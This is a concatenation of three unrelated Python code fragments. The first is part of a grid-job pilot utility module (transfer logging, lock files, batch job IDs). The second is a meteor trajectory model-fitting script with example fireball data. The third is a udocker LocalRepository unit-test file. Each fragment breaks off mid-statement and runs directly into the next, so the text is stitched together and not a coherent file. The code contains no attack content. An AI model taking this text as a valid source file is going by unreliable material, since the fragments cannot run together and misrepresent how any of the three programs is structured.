supported,") tolog(". otherwise this job will fail") elif not some_transferred: tolog(". No files (%d/%d) were transferred or registered" % (nr_transferred, nr_files)) if nr_files > 1: tolog(". The files will be transferred and registrered by a later pilot if job recovery is supported,") else: tolog(". The file will be transferred and registrered by a later pilot if job recovery is supported,") tolog(". otherwise this job will fail") else: tolog(". Mover has finished") if fail != 0: tolog(". File transfer exit code : (%d, %s)" % (fail, error.getErrorStr(fail))) else: tolog(". File transfer exit code : (%d, <no error>)" % (fail)) if some_transferred: tolog(". File registration return values : (%d, %s, %s)" %\ (ec, error.getErrorStr(ec), str(ret))) tolog(". Put function will return fields : %s" % str(fields)) tolog(". Transfer and registration report produced at : %s" % timeStamp()) tolog("...........................................................................................................") tolog("") def hasBeenTransferred(fields): """ determine whether files were successfully transferred """ status = False s = 0 # the fields will all be empty if no files were transferred for field in fields: s += len(field) if s > 0: status = True return status def removeSRMInfo(f0): """ remove any SRM info from the f0 string """ from SiteMover import SiteMover fields0 = "" for pfns in f0.split("+"): if pfns != "": pfns = SiteMover.stripPortAndVersion(pfns) fields0 += "%s+" % (pfns) # remove any trailing +-sign if fields0[-1] == "+": fields0 = fields0[:-1] if fields0 == "": fields0 = f0 if f0 != fields0: tolog("removeSRMInfo() has updated %s to %s" % (f0, fields0)) return fields0 def lateRegistration(ub, job, type="unknown"): """ late registration used by the job recovery """ # function will return True if late registration has been performed, False if it failed # and None if there is nothing to do status = False latereg = False fields = None # protect against old jobState files which may not have the new variables try: tolog("type: %s" % (type)) if type == "output": if job.output_latereg == "False": latereg = False else: latereg = True fields = job.output_fields elif type == "log": if job.log_latereg == "False": latereg = False else: latereg = True fields = job.log_field else: tolog("!!WARNING!!4000!! Unknown id type for registration: %s" % (type)) tolog("!!WARNING!!4000!! Skipping late registration step") pass except Exception, e: tolog("!!WARNING!!4000!! Late registration has come upon an old jobState file - can not perform this step: %s" % e) pass else: tolog("latereg: %s" % str(latereg)) tolog("fields: %s" % str(fields)) # should late registration be performed? # if latereg: # ec, ret = registerFiles(fields, ub=ub) # if ec == 0: # tolog("registerFiles done") # status = True # else: # tolog("!!WARNING!!4000!! File registration returned: (%d, %s)" % (ec, ret)) if not latereg: tolog("Nothing to register (%s)" % (type)) return None else: return status def isAnalysisJob(trf): """ Determine whether the job is an analysis job or not """ if (trf.startswith('https://') or trf.startswith('http://')): analysisJob = True else: analysisJob = False return analysisJob def timedCommand(cmd, timeout=300): """ Protect cmd with timed_command """ tolog("Executing command: %s (protected by timed_command, timeout: %d s)" % (cmd, timeout)) t0 = os.times() try: exitcode, telapsed, cout, cerr = timed_command(cmd, timeout) except Exception, e: pilotErrorDiag = 'timed_command() threw an exception: %s' % e tolog("!!WARNING!!2220!! %s" % pilotErrorDiag) exitcode = 1 output = e t1 = os.times() telapsed = int(round(t1[4] - t0[4])) else: if cerr != "" and exitcode != 0: tolog("!!WARNING!!2220!! Timed command stderr: %s" % (cerr)) output = cerr else: output = cout tolog("Elapsed time: %d" % (telapsed)) if telapsed >= timeout: tolog("!!WARNING!!2220!! Command timed out") output += " (timed out)" # timed_command adds a trailing \n, remove it if output.endswith('\n'): output = output[:-1] return exitcode, output def stringToFields(jobFields): """ Convert a jobState string to a fields array """ jobFields = jobFields.replace('[','').replace(']','') jobFields = jobFields.replace("\'","") rf = jobFields.split(',') fields = [] for f in rf: fields += [f.strip()] return fields def readpar(parameter, alt=False, version=0): """ Read 'parameter' from queuedata via SiteInformation class """ from SiteInformation import SiteInformation si = SiteInformation() return si.readpar(parameter, alt=alt, version=version) def getBatchSystemJobID(): """ return the batch system job id (will be reported to the server) """ # BQS (e.g. LYON) if os.environ.has_key("QSUB_REQNAME"): return "BQS", os.environ["QSUB_REQNAME"] # BQS alternative if os.environ.has_key("BQSCLUSTER"): return "BQS", os.environ["BQSCLUSTER"] # Torque if os.environ.has_key("PBS_JOBID"): return "Torque", os.environ["PBS_JOBID"] # LSF if os.environ.has_key("LSB_JOBID"): return "LSF", os.environ["LSB_JOBID"] # Sun's Grid Engine if os.environ.has_key("JOB_ID"): return "Grid Engine", os.environ["JOB_ID"] # Condor (variable sent through job submit file) if os.environ.has_key("clusterid"): return "Condor", os.environ["clusterid"] # Condor (get jobid from classad file) if os.environ.has_key("_CONDOR_JOB_AD"): return "Condor", commands.getoutput('sed -n "s/GlobalJobId.*\\"\\(.*\\)\\".*/\\1/p" %s' % os.environ["_CONDOR_JOB_AD"]) # SLURM if os.environ.has_key("SLURM_JOB_ID"): return "SLURM", os.environ["SLURM_JOB_ID"] # # Condor (id unknown) # if os.environ.has_key("_CONDOR_SCRATCH_DIR"): # return "Condor", "(unknown clusterid)" return None, "" def touch(filename): """ touch a file """ if not os.path.isfile(filename): try: os.system("touch %s" % (filename)) except Exception, e: tolog("!!WARNING!!1000!! Failed to touch file: %s" % e) else: tolog("Lock file created: %s" % (filename)) def createLockFile(jobrec, workdir, lockfile="LOCKFILE"): """ Site workdir protection to prevent the work dir from being deleted by the cleanup function if pilot fails to register the log """ # only try to create a lock file if it doesn't exist already # do not bother to create it if the site doesn't allow for job recovery f = "%s/%s" % (workdir, lockfile) if lockfile == "LOCKFILE": if jobrec: touch(f) else: touch(f) def checkLockFile(workdir, lockfile): """checks if a lockfile exists in path workdir/lockfile """ f = '%s/%s' % (workdir, lockfile) return os.path.isfile(f) def verifyTransfer(workdir, verbose=True): """ verify that all files were transferred by checking the existance of the ALLFILESTRANSFERRED lockfile """ status = False fname = "%s/ALLFILESTRANSFERRED" % (workdir) if os.path.exists(fname): if verbose: tolog("Verified: %s" % (fname)) status = True else: if verbose: tolog("Transfer verification failed: %s (file does not exist)" % (fname)) return status def removeLEDuplicates(logMsg): """ identify duplicated messages in the log extracts and remove them """ # first create a new log extracts list that does not have the time stamps # (which will be different for the otherwise different messages) # E.g.: # 31 Mar 2008 01:32:37| !!WARNING!!1999!! Could not read modification time of ESD.020072._04023.pool.root.9 # 31 Mar 2008 02:03:08| !!WARNING!!1999!! Could not read modification time of ESD.020072._04023.pool.root.9 # should only be printed once, # 31 Mar 2008 01:32:37| !!WARNING!!1999!! Could not read modification time of ESD.020072._04023.pool.root.9 log_extracts_list = logMsg.split('\n') # create a temporary list with stripped timestamp fields log_extracts_tmp = [] pattern = re.compile(r"(\d+ [A-Za-z]+ \d+ \d+:\d+:\d+\|)") for line in log_extracts_list: # id the time stamp found = re.findall(pattern, line) if len(found) > 0: # remove any time stamp line = line.replace(found[0], '') log_extracts_tmp.append(line) # remove duplicate lines and create an index list to know where the original line was # (we want to bring back the timestamp) # do not use dictionaries since they are not sorted i = 0 log_extracts_index = [] log_extracts_tmp2 = [] for line in log_extracts_tmp: if line not in log_extracts_tmp2: log_extracts_index.append(i) log_extracts_tmp2.append(line) i += 1 # create the final list log_extracts_tmp = [] for index in log_extracts_index: log_extracts_tmp.append(log_extracts_list[index]) # return the stripped logMsg return "\n".join(log_extracts_tmp) def writeTimeStampToFile(path="", filename="", overwrite=True): """ Write the current time stamp to file """ if filename == "": filename = "START_TIME" if path == "": path = os.getcwd() _filename = os.path.join(path, filename) # Are we allowed to overwrite? proceed = False if overwrite: proceed = True else: # Only proceed if the file does not exist already if not os.path.exists(_filename): proceed = True if proceed: writeToFile(_filename, timeStampUTC(format='%Y-%m-%d %H:%M:%S')) def writeToFile(filename, s): """ Write string s to file """ # Ignore write status status = writeToFileWithStatus(filename, s) def writeToFileWithStatus(filename, s, attribute="w"): """ Write string s to file with status return """ status = False try: f = open(filename, attribute) except Exception, e: tolog("!!WARNING!!2990!! Could not open: %s, %s" % (filename, e)) else: f.write("%s" % (s)) f.close() tolog('Wrote string "%s" to file: %s' % (s.replace('\n',''), filename)) status = True return status def readCodeFromFile(filename): """ Wead exit code from file <workdir>/EXITCODE """ ec = 0 if os.path.exists(filename): try: f =
with the given parameters time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # Sum of squared residuals cost = np.sum((time_target - time_arr)**2) # # Sum of absolute residuals # cost = np.sum(np.abs(time_target - time_arr)) print("Cost = {:16.10f}, guess: l0 = {:7.3f}, v0 = {:6.3f}, vi = {:6.3f}, sigma = {:.5f}".format(cost, *params)) return cost # Choose t0 at the 0.77*max_time (converges better if this is at a point where there's deceleration) t0 = 0.77*np.max(time_data) print("t0 = {:.2f} s".format(t0)) # Construct the initial guess of the fit parameters using the Jacchia function l0 = jacchiaFuncLen(t0, a1, a2, a3, a4) v0 = jacchiaFuncVel(t0, a1, a2, a3, a4) v_inf = a2 sigma = sigma_initial # km^2/s^2 # Separate initial guess velocities if they are too close if (v_inf - v0) < 1: v0 = v_inf - 2 p0 = [l0, v0, v_inf, sigma] print("Initial parameters:", p0) # Set the optimization bounds bounds = [ ( 0, np.max(len_data)), # l0 ( 0, 80.0), # v0 (10, 80.0), # v_inf (0.0001, 1.0) # sigma ] # Set the constraint that v_inf > v0 constraints = ({'type': 'ineq', 'fun': lambda x: x[2] - x[1]}) # Fit the parameters to the observations res = scipy.optimize.minimize(_residuals, p0, args=(t0, c, zr, dens_interp, len_data, time_data), \ bounds=bounds, constraints=constraints, method='SLSQP') # # Default tolerance using by SLSQP # ftol = 1e-06 # # Compute the formal uncertainties # # Source: https://stackoverflow.com/a/53489234 # tmp_i = np.zeros(len(res.x)) # for i in range(len(res.x)): # tmp_i[i] = 1.0 # hess_inv_i = res.hess_inv(tmp_i)[i] # uncertainty_i = np.sqrt(max(1, abs(res.fun))*ftol*hess_inv_i) # tmp_i[i] = 0.0 # print('x^{0} = {1:.3f} ± {2:.6f}'.format(i, res.x[i], uncertainty_i)) l0, v0, v_inf, sigma = res.x return t0, l0, v0, v_inf, sigma, c, zr, dens_interp if __name__ == "__main__": import os import sys import argparse import matplotlib.pyplot as plt from wmpl.Utils.Pickling import loadPickle # ### COMMAND LINE ARGUMENTS # # Init the command line arguments parser # arg_parser = argparse.ArgumentParser(description="""Fit the Pecina & Ceplecha (1984) model to a trajectory in the pickle file.""", # formatter_class=argparse.RawTextHelpFormatter) # arg_parser.add_argument('input_file', type=str, help='Path to the .pickle file.') # # Parse the command line arguments # cml_args = arg_parser.parse_args() # ############################ # # Load the pickle file # if not os.path.isfile(cml_args.input_file): # print("Could not find file:", cml_args.input_file) # print("Exiting...") # sys.exit() # # Load the trajectory pickle file # traj = loadPickle(*os.path.split(cml_args.input_file)) # # Extract the time, height, and length data # time_data = [] # len_data = [] # ht_data = [] # vel_data = [] # for obs in traj.observations: # # Relative time in seconds # time_obs = obs.time_data[obs.ignore_list == 0] # time_data += time_obs.tolist() # # Height in km # ht_obs = obs.model_ht[obs.ignore_list == 0]/1000 # ht_data += ht_obs.tolist() # # Length in km # len_obs = obs.state_vect_dist[obs.ignore_list == 0]/1000 # len_data += len_obs.tolist() # # Velocity in km/s # vel_obs = obs.velocities[obs.ignore_list == 0]/1000 # vel_data += vel_obs.tolist() # # Sort observations by length # tmp_arr = np.c_[time_data, ht_data, len_data, vel_data] # tmp_arr = tmp_arr[np.argsort(len_data)] # time_data, ht_data, len_data, vel_data = tmp_arr.T # # # Check data # # plt.scatter(time_data, len_data) # # plt.show() # # plt.scatter(ht_data, vel_data) # # plt.show() # # Fit the Pecina & Ceplecha (1984) model to observations # t0, l0, v0, v_inf, sigma, c, zr, dens_interp = fitPecinaCeplecha84Model(traj.rend_lat, traj.rend_lon, \ # traj.jdt_ref, time_data, ht_data, len_data) # print("Solution:") # print(" t0 = {:.3f} s".format(t0)) # print(" l0 = {:.3f} km".format(l0)) # print(" v0 = {:.3f} km/s".format(v0)) # print(" v_inf = {:.3f} km/s".format(v_inf)) # print(" sigma = {:.6f} km^2/s^2".format(sigma)) # # Compute the h0 limit # h0 = htFromLen(l0, c, zr) # # Compute the velocity from height and model parameters # ht_arr = ht_dens_arr = np.linspace(1000*np.min(ht_data), 1000*np.max(ht_data), 100) # vel_arr = 1000*velFromHt(ht_arr/1000, h0, v0, v_inf, sigma, c, zr, dens_interp) # # Plot velocity observations vs fit # plt.scatter(vel_data[vel_data > 0], ht_data[vel_data > 0]) # plt.plot(vel_arr/1000, ht_arr/1000) # plt.xlabel("Velocity (km/s)") # plt.ylabel("Height (km)") # plt.show() # # Compute the time from height and model parameters # len_arr = np.linspace(np.min(len_data), np.max(len_data), 100) # time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # # Plot time vs length observations vs fit # plt.scatter(time_data, len_data) # plt.plot(time_arr, len_arr) # plt.xlabel("Time (s)") # plt.ylabel("Length (km)") # plt.show() # # Plot fit residuals # time_residuals = time_data - timeFromLen(len_data, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # plt.scatter(len_data, time_residuals) # # Plot the zero line # plt.plot(len_arr, np.zeros_like(len_arr), c='k', linestyle='dashed') # plt.xlabel("Length (km)") # plt.ylabel("Time residuals (s)") # max_res = 1.2*np.max(np.abs(time_residuals)) # plt.ylim(-max_res, max_res) # plt.show() # sys.exit() ### BELOW IS THE EXAMPLE FOR THE ORIGINAL PAPER ### # Location data for the PN example event (rough) lat = np.radians(50) lon = np.radians(-107) jd = 2444239.50000 # Example data from Pecina & Ceplecha (1983) for PN 39 404 pn_data = np.array([ # t(s),h (km),l (km) [0.00,79.174,0.000], [0.05,78.581,0.714], [0.10,77.904,1.530], [0.15,77.311,2.246], [0.25,76.015,3.808], [0.30,75.384,4.569], [0.40,74.111,6.102], [0.45,73.461,6.886], [0.50,72.837,7.639], [0.55,72.195,8.413], [0.60,71.556,9.183], [0.65,70.909,9.964], [0.70,70.269,10.735], [0.75,69.646,11.487], [0.90,67.750,13.773], [1.00,66.482,15.303], [1.05,65.852,16.062], [1.10,65.229,16.814], [1.15,64.596,17.578], [1.20,63.960,18.345], [1.25,63.338,19.096], [1.30,62.694,19.873], [1.35,62.086,20.606], [1.40,61.449,21.376], [1.45,60.829,22.123], [1.55,59.558,23.657], [1.60,58.949,24.392], [1.70,57.685,25.918], [1.75,57.055,26.679], [1.80,56.424,27.440], [1.85,55.795,28.199], [1.90,55.187,28.933], [1.95,54.576,29.671], [2.00,53.995,30.372], [2.05,53.340,31.163], [2.20,51.410,33.493], [2.30,50.191,34.966], [2.35,49.563,35.724], [2.40,48.892,36.534], [2.45,48.294,37.257], [2.50,47.682,37.996], [2.55,47.107,38.691], [2.60,46.500,39.424], [2.65,45.900,40.148], [2.70,45.289,40.887], [2.75,44.713,41.583], [2.85,43.532,43.010], [2.90,42.907,43.765], [2.95,42.363,44.422], [3.05,41.144,45.895], [3.10,40.581,46.575], [3.15,40.001,47.276], [3.20,39.478,47.909], [3.25,38.925,48.577], [3.30,38.369,49.249], [3.35,37.851,49.875], [3.50,36.290,51.762], [3.60,35.301,52.957], [3.65,34.825,53.533], [3.70,34.330,54.128], [3.75,33.915,54.633], [3.80,33.430,55.220], [3.85,32.993,55.743], [3.90,32.592,56.233], [3.95,32.184,56.727], [4.00,31.798,57.193], [4.05,31.436,57.631], [4.15,30.765,58.443], [4.20,30.442,58.832], [4.25,30.134,59.205], [4.35,29.565,59.894], [4.40,29.314,60.198], [4.45,29.049,60.517], [4.50,28.807,60.810], [4.55,28.567,61.101], [4.60,28.347,61.367] ]) # Extract the example PN data time_data, ht_data, len_data = pn_data.T # Compute the point-to-point velocity len_diff = len_data[1:] - len_data[:-1] time_diff = time_data[1:] - time_data[:-1] vel_data = len_diff/time_diff # Fit the Pecina & Ceplecha (1984) model to observations t0, l0, v0, v_inf, sigma, c, zr, dens_interp = fitPecinaCeplecha84Model(lat, lon, jd, time_data, ht_data, len_data) # Compute the h0 limit h0 = htFromLen(l0, c, zr) # Compute the velocity from height and model parameters ht_arr = ht_dens_arr = np.linspace(1000*np.min(ht_data), 1000*np.max(ht_data), 100) vel_arr = 1000*velFromHt(ht_arr/1000, h0, v0, v_inf, sigma, c, zr, dens_interp) # Plot velocity observations vs fit plt.scatter(vel_data, ht_data[1:]) plt.plot(vel_arr/1000, ht_arr/1000) plt.xlabel("Velocity (km/s)") plt.ylabel("Height (km)") plt.show() # Compute the time from height and model parameters len_arr = np.linspace(np.min(len_data), np.max(len_data), 100) time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # Plot time vs length observations vs fit plt.scatter(time_data, len_data) plt.plot(time_arr, len_arr) plt.xlabel("Time (s)") plt.ylabel("Length (km)") plt.show() sys.exit() ### BELOW IS THE CHECK OF THE FUNCTIONS ON THE ORIGINAL VALUES FROM THE PAPER ### ### FIT THE AIR DENSITY MODEL ### # Fit a 7th order polynomial to the air mass density from NRL-MSISE from the ceiling height to 3 km below # the fireball - limit the height to 12 km ht_min = np.min(ht_data) - 3 if ht_min < 12: ht_min = 12 # Compute the poly fit print("Fitting atmosphere polynomial...") dens_co = fitAtmPoly(lat, lon, 1000*ht_min, 1000*HT_CEILING, jd) # Create a convinience function for compute the density at the given height dens_interp = lambda h: atmDensPoly(h, dens_co) print(" ... done!") ### ### TEST EXAMPLE ### # PN v_inf = 15.3456 # km/s m_inf = 91.2 # kg sigma = 0.0308 # km^2/s^2 zr = np.radians(34.089) K = 1.0*1.2*650**(-2/3.0) # m^2/kg^(2/3) t0 = 3.5 # s l0 = 51.773 # km v0 = 12.281 # km/s # # Compute the velocity for every height using K # vel_arr = velFromHtPhysicalParams(ht_arr, 1000*v_inf, m_inf, sigma/1e6, zr, K, dens_interp) # # Plot observations vs fit # plt.scatter(ht_data[1:], vel_data) # plt.plot(ht_arr/1000, vel_arr/1000) # plt.show() # sys.exit() ### print("Finding height-length constant...") # Find the height-length constant and zenith angle p0 = [0, np.radians(45)] res = scipy.optimize.minimize(_lenFromHtResidual, p0, args=(ht_data, len_data)) # Extracted fitted parameters c, zr = res.x zr = np.abs(zr) print("c = {:.2f} km".format(c)) print("zr = {:.2f} deg".format(np.degrees(zr))) # Compute the h0 limit h0 = htFromLen(l0, c, zr) # Compute the velocity from height and model parameters ht_arr = ht_dens_arr = np.linspace(1000*ht_min, 1000*np.max(ht_data), 100) vel_arr = 1000*velFromHt(ht_arr/1000, h0,
<reponame>kellrott/udocker #!/usr/bin/env python """ udocker unit tests: LocalRepository """ from unittest import TestCase, main from unittest.mock import patch, mock_open, call from udocker.container.localrepo import LocalRepository from udocker.config import Config BUILTIN = "builtins" BOPEN = BUILTIN + '.open' UDOCKER_TOPDIR = "/home/u1/.udocker" class LocalRepositoryTestCase(TestCase): """Management of local repository of container images and extracted containers """ def setUp(self): Config().getconf() Config().conf['topdir'] = UDOCKER_TOPDIR Config().conf['bindir'] = "" Config().conf['libdir'] = "" Config().conf['reposdir'] = "" Config().conf['layersdir'] = "" Config().conf['containersdir'] = "" Config().conf['homedir'] = "/home/u1" def tearDown(self): pass @patch('udocker.container.localrepo.FileUtil') def test_01_init(self, mock_fu): """Test01 LocalRepository() constructor.""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] lrepo = LocalRepository(UDOCKER_TOPDIR) self.assertTrue(lrepo.topdir) self.assertTrue(lrepo.reposdir) self.assertTrue(lrepo.layersdir) self.assertTrue(lrepo.containersdir) self.assertTrue(lrepo.bindir) self.assertTrue(lrepo.libdir) self.assertTrue(lrepo.homedir) self.assertEqual(lrepo.topdir, UDOCKER_TOPDIR) self.assertEqual(lrepo.cur_repodir, "") self.assertEqual(lrepo.cur_tagdir, "") self.assertEqual(lrepo.cur_containerdir, "") self.assertTrue(mock_fu.register_prefix.called_count, 3) @patch('udocker.container.localrepo.FileUtil') def test_02_setup(self, mock_fu): """Test02 LocalRepository().setup().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None, None, None, None] newdir = "/home/u2/.udocker" lrepo = LocalRepository(UDOCKER_TOPDIR) lrepo.setup(newdir) self.assertEqual(lrepo.topdir, newdir) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.os.makedirs') @patch('udocker.container.localrepo.FileUtil') def test_03_create_repo(self, mock_fu, mock_mkdir, mock_exists): """Test03 LocalRepository().create_repo().""" Config.conf['keystore'] = "tmp" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [False, False, False, False, False, False, False, False] mock_mkdir.side_effect = [None, None, None, None, None, None, None, None] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.create_repo() self.assertTrue(status) self.assertTrue(mock_exists.call_count, 8) self.assertTrue(mock_mkdir.call_count, 8) Config.conf['keystore'] = "tmp" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = OSError("fail") lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.create_repo() self.assertFalse(status) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_04_is_repo(self, mock_fu, mock_exists): """Test04 LocalRepository().is_repo().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [False, True, False, False, True] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_repo() self.assertTrue(mock_exists.call_count, 5) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [True, True, True, True, True] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_repo() self.assertTrue(mock_exists.call_count, 5) self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_05_is_container_id(self, mock_fu): """Test05 LocalRepository().is_container_id().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) self.assertTrue(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) self.assertFalse(status) @patch.object(LocalRepository, '_protect') @patch('udocker.container.localrepo.FileUtil') def test_06_protect_container(self, mock_fu, mock_prot): """Test06 LocalRepository().protect_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_prot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.protect_container(contid) self.assertTrue(status) self.assertTrue(mock_prot.called) @patch.object(LocalRepository, '_unprotect') @patch('udocker.container.localrepo.FileUtil') def test_07_unprotect_container(self, mock_fu, mock_unprot): """Test07 LocalRepository().unprotect_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_unprot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.unprotect_container(contid) self.assertTrue(status) self.assertTrue(mock_unprot.called) @patch.object(LocalRepository, '_isprotected') @patch('udocker.container.localrepo.FileUtil') def test_08_isprotected_container(self, mock_fu, mock_isprot): """Test08 LocalRepository().isprotected_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_isprot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.isprotected_container(contid) self.assertTrue(status) self.assertTrue(mock_isprot.called) @patch('udocker.container.localrepo.FileUtil') def test_09__protect(self, mock_fu): """Test09 LocalRepository()._protect().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" lrepo = LocalRepository(UDOCKER_TOPDIR) with patch(BOPEN, mock_open()): status = lrepo._protect(cdir) self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_10__unprotect(self, mock_fu): """Test10 LocalRepository()._unprotect().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._unprotect(cdir) self.assertTrue(status) self.assertTrue(mock_fu.return_value.remove.called) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_11__isprotected(self, mock_fu, mock_exists): """Test11 LocalRepository()._isprotected().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._isprotected(cdir) self.assertTrue(status) self.assertTrue(mock_exists.called) @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.os.access') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_12_iswriteable_container(self, mock_fu, mock_exists, mock_isdir, mock_access, mock_cdcont): """Test12 LocalRepository().iswriteable_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_exists.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 2) self.assertTrue(mock_exists.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 3) self.assertTrue(mock_isdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = True mock_access.return_value = True mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 1) self.assertTrue(mock_access.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = True mock_access.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 0) @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.Uprocess.get_output') @patch('udocker.container.localrepo.FileUtil') def test_13_get_size(self, mock_fu, mock_getout, mock_cdcont): """Test13 LocalRepository().get_size().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_getout.return_value = "1234 dd" mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_size(container_id) self.assertEqual(status, 1234) self.assertTrue(mock_getout.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_getout.return_value = "" mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_size(container_id) self.assertEqual(status, -1) @patch('udocker.container.localrepo.os.listdir') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.FileUtil') def test_14_get_containers_list(self, mock_fu, mock_isdir, mock_listdir): """Test14 LocalRepository().get_containers_list().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.return_value = False mock_listdir.return_value = list() cdir = "/home/u1/.udocker/containers" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertEqual(lrepo.containersdir, cdir) self.assertFalse(mock_listdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.return_value = True mock_listdir.return_value = list() cdir = "/home/u1/.udocker/containers" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertTrue(mock_listdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.side_effect = [True, False] cdir = "/home/u1/.udocker/containers" mock_listdir.return_value = [cdir] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertTrue(mock_listdir.called) self.assertTrue(mock_isdir.call_count, 2) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.side_effect = [True, True] cdir = "/home/u1/.udocker/containers" mock_listdir.return_value = ["a"] lrepo = LocalRepository(UDOCKER_TOPDIR) with patch(BOPEN, mock_open()): status = lrepo.get_containers_list() self.assertEqual(status, [cdir + "/" + "a"]) self.assertTrue(mock_listdir.called) self.assertTrue(mock_isdir.call_count, 2) @patch.object(LocalRepository, 'del_container_name') @patch.object(LocalRepository, 'cd_container') @patch.object(LocalRepository, 'get_container_name') @patch.object(LocalRepository, 'get_containers_list') @patch('udocker.container.localrepo.FileUtil') def test_15_del_container(self, mock_fu, mock_getlist, mock_getname, mock_cdcont, mock_delname): """Test15 LocalRepository().del_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_cdcont.return_value = "" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_cdcont.return_value = contdir mock_getlist.return_value = [contdir] mock_delname.return_value = None mock_getname.return_value = ["mycont"] mock_fu.return_value.remove.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertFalse(status) self.assertTrue(mock_getlist.called) self.assertTrue(mock_delname.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = 